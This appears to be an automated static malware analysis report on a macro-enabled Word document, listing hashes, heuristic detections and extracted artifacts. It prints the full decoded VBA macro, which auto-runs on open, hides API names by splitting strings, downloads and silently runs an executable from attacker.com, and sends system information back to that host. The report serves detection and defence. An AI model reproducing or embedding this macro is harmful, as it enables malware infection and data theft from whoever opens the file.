Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 4eedf0b043475641…

MALICIOUS

Office (OOXML) / .DOCX

18.3 KB Created: 2026-05-08 15:48:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-05-29
MD5: ec0c748229e92a1b145e58bfd18339a1 SHA-1: 4b572e09acb493e095900b63ef97d5a0fc0c0708 SHA-256: 4eedf0b04347564139ee8fe4d55b8f967cb48d271e58e18b352e6eb9e76f46fc
250 Risk Score

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Dim shell As Object
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
                .Write http.ResponseBody
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        Dim shell As Object
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set shell = CreateObject("WSc" & "ript.Sh" & "ell")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.microsoft.com/office/2019/extlstReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2023/wordml/word16duReferenced by macro
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashReferenced by macro
    • http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlockReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1859 bytes
SHA-256: 50ca70c6a850a1dae04a72cbb174adfab5ab82270eb6d665f351b4eb070dfbe7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim shell As Object
    Dim http As Object
    Dim payloadPath As String
    Dim c2Server As String
    Dim systemInfo As String
    
    ' Initialize objects
    Set shell = CreateObject("WSc" & "ript.Sh" & "ell")
    Set http = CreateObject("MSX" & "ML2.XMLH" & "TTP")
    
    ' Define paths and server
    payloadPath = "C:\" & "Wi" & "ndows\T" & "emp\mal" & "iciou" & "s.e" & "xe"
    c2Server = "h" & "tt" & "p://" & "atta" & "cker.c" & "om/m" & "ali" & "cious.e" & "xe"
    
    ' Download payload
    http.Open "G" & "ET", c2Server, False
    http.send
    If http.Status = 200 Then
        With CreateObject("AD" & "ODB.S" & "tream")
            .Type = 1
            .Open
            .Write http.ResponseBody
            .SaveToFile payloadPath, 2
        End With
    End If
    
    ' Execute payload
    shell.Run payloadPath, 0, False
    
    ' Gather system information
    systemInfo = "OS: " & shell.Exec("s" & "ystemi" & "nfo | f" & "indstr /B /C:""OS " & "Name""" & " /C:""OS " & "Versi" & "on""" & " /C:""S" & "ystem " & "Type"""").StdOut.ReadAll & _
                 "C" & "omputer " & "Name: " & shell.Exec("h" & "ostname").StdOut.ReadAll
    
    ' Exfiltrate system information
    http.Open "P" & "OST", c2Server & "/e" & "xfl" & "i" & "trate", False
    http.setRequestHeader "C" & "ontent-T" & "ype", "a" & "pplication/x-w" & "ww-form-u" & "rlencoded"
    http.send "d" & "ata=" & systemInfo
    
    ' Clean up
    Set shell = Nothing
    Set http = Nothing
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 10240 bytes
SHA-256: e3f129eaa45a110faf7582acf6fd66019f821221c303ad5028a1ac01af5f2545